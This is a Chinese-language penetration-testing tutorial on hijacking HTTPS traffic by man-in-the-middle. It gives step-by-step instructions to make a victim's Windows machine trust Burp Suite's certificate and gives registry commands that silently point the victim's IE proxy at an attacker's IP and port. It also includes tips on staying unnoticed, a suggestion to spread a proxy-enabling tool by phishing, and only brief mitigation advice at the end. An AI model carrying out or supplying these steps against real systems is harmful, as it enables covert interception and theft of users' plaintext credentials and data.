滲透測試 https 中間人劫持攻擊 修復建議

敏感數據的安全傳輸是網絡安全技術的一個重要的組成部分，多數認為只有https是最好的實踐，姑且不考慮ssl證書的價格，至少https也不是絕對安全的，當遭受中間人劫持攻擊的時候也會獲取到傳輸中的明文數據，具體攻擊原理見《HTTPS連接過程以及中間人攻擊劫持》，但是這篇文章也說了，使用中間人攻擊手段必須讓客戶端信任中間人的證書，否則攻擊無效。因此這種攻擊方式難度大且不方便攻擊，但是並不是說不能實現。個人認為至少有以下兩種方式可以進行利用：
??一、獲取服務器的遠程桌面登錄權限後，設置客戶端信任中間人的證書！
??二、使用物理攻擊，獲取到被攻擊者的電腦後，設置客戶端信任中間人的證書

1.1.1 設置客戶端信任中間人證書

??這裏的中間人我們借助burpsuite，然後實現本次的一個https劫持攻擊。首先我們需要客戶端（被攻擊者的電腦）信任burpsuite的證書，即進行安裝burpsuite的CA證書，具體配置見官方配置。

1.1.2 攻擊條件

??通過思考我們發現，目前的利用也是存在有一定的限制的，姑且理解為技術不夠。攻擊條件主要有以下幾方面：
??一、服務器需要是windows主機。
??二、攻擊者需要有獨立外網主機（或者同一局域網中）。
??三、擁有服務器的遠程桌面控制權，或者臨時擁有被攻擊者的電腦。
??對於第三個條件簡單說明下，擁有服務器的遠程桌面控制權，不一定能獲取到應用系統中存在的敏感數據或者數據庫中的數據，例如，你在一個網站（只有一個登陸頁面）處檢測出了命令執行漏洞，可以執行命令，但是權限不是很高（即使權限很高，除非你只感興趣服務器的控制權而不是應用系統中的敏感數據），此時我們就可以使用這種攻擊方式了！

1.1.3 實驗環境介紹

??操作系統：Microsoft Windows Server 2008 R2 Enterprise，IP：192.168.1.25
??用戶權限組：*Users
??使用工具：burpsuite
??攻擊者IP：192.168.1.200

1.1.4 配置攻擊者burpsuite

??由於我們是要獲取被攻擊者傳過來的數據包，而被攻擊者往往都是處於內網，外網訪問多數是通過映射出來的，所以我們設置我們的burpsuite的代理為任意ip過來的數據包，如下圖所示：

1.1.5 設置被攻擊者IE代理

??如果能進入到桌面環境，可以通過圖形化界面進行設置IE代理，如下圖所示：

??如果不能進入到遠程桌面，我們可以使用下面命令進行設置IE代理：

//開啟代理！
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyEnable /t REG_DWORD /d 1 /f
    //設置代理ip及端口，為攻擊者的ip，端口與burpsuite設置保持一致！
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer /d "192.168.1.200:8080" /f
    //關閉設置的代理可以使用下面的命令：
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyEnable /t REG_DWORD /d 0 /f

??以上命令經測試只要是users用戶組即可成功執行，如下圖所示，為了方便我們可以將開啟和關閉的命令分別寫為bat批處理文件。

1.1.6 獲取劫持後的明文數據

??為了不讓被攻擊者懷疑，我們不要開啟截斷功能，如下圖所示：

??現在攻擊者只需要等待被攻擊者使用瀏覽器訪問相關網站，即使是https的站點我們同樣能劫持到明文數據，如下圖所示：

1.1.7 總結及修復建議

??另外如果只是http的網站的話，上面的攻擊難度及危害會大大增加，因為不需要設置客戶端去信任中間人的證書這一環節，只需要設置客戶端的代理即可，而這一個可以使用釣魚的方式將開啟代理功能的工具進行傳播就可以，或者只需要一個簡單命令執行shell，普通權限就可以！修復建議參考如下：
??一、對服務器進行安全加固，防止利用服務器漏洞進行攻擊！
??二、設置瀏覽器不要使用默認的系統代理，即IE全局代理！
??三、加強安全意識，離開電腦的時候記得設置密碼鎖屏，借電腦給別人用的時候盡量在旁邊，使用完成後檢查是否有異常！

中間人攻擊之劫持HTTPS明文數據